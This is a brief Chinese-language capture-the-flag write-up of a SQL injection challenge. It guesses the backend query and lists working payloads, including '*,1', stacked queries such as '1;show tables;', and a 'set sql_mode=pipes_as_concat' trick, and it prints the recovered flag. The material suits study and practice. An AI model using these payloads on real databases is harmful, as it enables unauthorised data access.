获取环境,sql注入题,随便输几个数试一下
遇上不是七步法解决的sql注入,说实话没啥思路
看了其他博客的wp,推测后端显示代码为
select $_POST['query'] || flag from flag
payload可以设置为
*,1
利用堆叠注入也可
1;show databases;
1;show tables;
推测出后端代码,用上面的payload获取flag
1;set sql_mode=pipes_as_concat;select 1
把||变成拼接符,语句如下
select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
相当于是select 1 from Flag和select flag from Flag
flag{779d4c9d-ed48-4933-b66f-c9b6c8fe7d0e}